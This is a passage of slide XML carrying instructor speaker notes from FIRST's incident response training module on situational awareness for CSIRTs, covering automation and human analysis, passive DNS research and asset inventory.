                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB30EEF9-13FC-3B4D-9155-14674D79A6B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458788" y="4343400"/>
            <a:ext cx="5938837" cy="4113213"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Situational Awareness Is Foundational: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> And once the data has arrived, you’ll want to be able to quickly resolve issues because you have better preventative and remediation methods. You can undertake:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>An organizational, strategic-level risk assessment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Support tasks for investigative efforts that allow you to more quickly spot and triage current attacks and anomalies, and to develop more comprehensive preventative measures and remediation processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>For your organization, what types of information is most significant in changing your situational awareness? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The answers will vary by student, but the most common answer is incidents. Explore how each chose his or her top item. This wraps back to the Triage section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>So now let’s talk about the two elements that go into situational awareness: automated data and human augmentation. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCC5D0B-7A64-4A47-86B5-E2F00E185E47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{6C70AA9C-4586-9240-B45C-9FF20CBA2CB4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51205" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2186792E-9C6D-DE41-9E89-8C63398E60CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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3250" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6650FE-6CDB-424D-B4DC-0989446C21D3}"/>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3AE9DCDD-B422-AE45-BD94-471A9E8B90CD}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78849" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB842A0-156C-254B-B02D-3EBFD94130B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="4033838"/>
            <a:ext cx="6019800" cy="4113212"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Features of Successful Situational Awareness: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> It is not possible for your team to manually investigate all the information that comes into your organization. This is especially true for low-level data: think of all logs, flow records, and events coming down every second; therefore, automation is imperative. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Automation summarizes the large amounts of information coming to you. It should also be designed to highlight information relevant to your environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="14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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>But we cannot overemphasize that the large amount of data coming in requires the intelligence of a human analyst. One of your most important responsibilities is to take automatically-generated information and turn it into useful and actionable results that enable you to adjust your security position and refine the scope of your situational awareness.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BB5B71-D58F-1446-B5A3-387EE190D3B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{9AA61CE0-B3AD-F242-B07E-59D3E2A3A759}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53253" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C78927C-3EBA-B94C-BB79-7A5EBCB16B4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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5298" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539E9CFF-1649-1B49-BD6D-167186464FC1}"/>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62114354-C2B3-334C-9D82-E92A3989190E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2462E1A-65F7-8B46-9576-2CE42BB1E8A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="4033838"/>
            <a:ext cx="6019800" cy="411321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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Features of Successful Situational Awareness: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>1 minute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>60 minutes so far</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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> A few examples of the automated data and the results of human analysis based on situational awareness are listed on the screen. The last example shows that understanding your environment allows you to make more informed decisions. And you will always cycle back to update your awareness of your security posture. For example, those IP addresses leading to blacklisting might also lead to further research – is that block of IP addresses significant? You can use passive DNS to determine to what domains this block of addresses resolves. These domains might be detection indicators or used for tracking malicious actors. </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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Now that we have covered the key points of situational awareness, let’s focus specifically on internal situational awareness. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E912C9-0BB6-D243-AFDE-0F2E8675E3E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{EC81CFF4-2F39-6E4E-A30B-07B6DDEB0683}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55301" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A912E05C-013D-3649-B9C2-AC549E0997EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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7346" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDD6B2AB-A008-714E-9ED6-354211453672}"/>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3CAB78B2-5D6F-9145-BD3E-8EBA6CB3FB22}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80897" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9663B375-4223-9549-9198-3BAB64902D83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247650" y="3754438"/>
            <a:ext cx="6361113" cy="6453187"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Internal Situational Awareness for Organizational CSIRTs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>2 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> First and foremost, you need to be acquainted with all of your assets, where they reside and how they are connected. To maintain this, you should consider a system to manage those assets. And that system should be integrated into your own processes so you can easily relate an IP address to an owner or business. Also helpful is a list of all affected systems based on the operating system, hardware, or application. In addition, you will want to be aware of the relative importance of these assets to your business operations, specifically: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" lvl="2" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Which servers and individual computers are critical to ongoing business and which are only used for backend tasks, as well as network-connected door locks;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" lvl="2" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The information on network devices, address assignments, topology, routing, and external connectivity;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" lvl="2" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The information on operating systems and applications;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Databases and other sources of information;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="313"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Which electronically-stored data is useful to business operations and thus to an attacker vs. information that is not particularly useful;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="169863" indent="-169863" eaLnBrk="1">
              <a:spcBef>
